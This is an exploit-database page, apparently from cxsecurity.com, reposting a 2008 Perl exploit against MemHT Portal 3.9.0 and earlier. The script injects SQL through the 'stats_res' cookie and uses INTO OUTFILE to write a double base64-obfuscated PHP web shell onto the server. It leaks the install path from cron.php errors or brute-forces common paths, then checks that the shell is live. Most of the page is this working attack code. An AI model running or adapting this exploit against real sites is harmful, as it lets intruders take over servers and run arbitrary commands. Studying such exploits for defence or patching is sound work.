MemHT Portal <= 3.9.0 Remote Create Shell Exploit

2008-09-23 / 2008-09-24
Credit: Ams
Risk: Medium
Local: No
Remote: Yes

#!/usr/bin/perl # # MemHT Portal <= 3.9.0 Perl exploit # # discovered & written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIPTION: # Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's, # ($_COOKIE['stats_res']) which later goes to MySQL request. So we are able to make # sql injection. # This exploit tries to create shell in /uploads/media/defined.php. # # NEEDED: # magic_quotes_gpc = off # MySQL should be able to write to file # Know full server path to portal use strict; use warnings; use IO::Socket; print " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MemHT portal <= 3.9.0 Perl exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; @ARGV or &usage ; my $expl_url = shift; $expl_url =~ m#http://# or &usage; my $serv_path = shift || '-b'; my $def_shell = '/uploads/media/defined.php'; my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q' .'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ' .'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4' .'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk' .'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX' .'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth' .'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53' .'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO' .'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp' .'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV' .'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu' .'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow' .'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT' .'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ' .'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU' .'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa' .'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH' .'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa' .'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr' .'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN' .'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt' .'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP' .'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3' .'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0' .'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y' .'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ' .'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2' .'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds' .'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT' .'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ' .'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4' .'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ' .'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT' .'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa' .'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw' .'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK' .'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH' .'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27' .'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B'; # You can add more :P my @paths = qw( /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts /home/www home/httpd/vhosts /usr/local/apache/htdocs /www/htdocs ); if($serv_path ne '-b') { @paths = ($serv_path); } exploit($expl_url); sub exploit { # Defining vars. my $url = pop @_; print "\n\tExploiting $url\n"; my($host, $path, $packet, $rcvd); $url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e; # Trying to get /cron.php to get server path $packet = "POST $path/cron.php HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; $rcvd = send_pckt($host, $packet, 1); if( ! $rcvd) { print "\n\tUnable to connect to http://$host\n\n"; exit; } if ($rcvd =~ /Undefined variable:/) { $rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/; @paths = ($1); print "\n\tFound path!\n"; } else { print "\n\tStarting bruteforce...\n"; } # Some bruteforce here if path is not defined foreach $serv_path (@paths) { print ("\n\tTesting $serv_path$path$def_shell ...\n"); # Sending poisoned request $packet = "POST $path/index.php HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; if( ! send_pckt($host, $packet)) { print "\n\tUnable to connect to http://$host\n\n"; exit; } } # Checking for shell presence $packet = "POST $path$def_shell HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; sleep(1); $rcvd = send_pckt($host, $packet, 1); if( ! $rcvd) { print "\n\tUnable to connect to http://$host\n\n"; exit; } if ($rcvd =~ /tmp\s+shell/) { print "\n\tExploited!\n\n"; } else { print "\n\tExploiting failed.\n\n"; } } sub send_pckt() { my $dat = 1; my ($host, $packet, $ret) = @_; my $socket = IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket) { return 0; } else { print $socket $packet; if($ret) { my $rcv; while($rcv = <$socket>) { $dat .= $rcv; } } close $socket; return $dat; } } sub usage { print "\n\tUsage:\texpl.pl host [-b|full server path] (by default exlpoit checks /cron.php file errors to get real path, otherwise it will brute if failed, if used -b or none path is mentioned) Example:\t$0 http://localhost/ /var/www/htdocs $0 http://localhost/ -b $0 http://localhost/\n\n"; exit; }

References:

http://www.milw0rm.com/exploits/6393


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top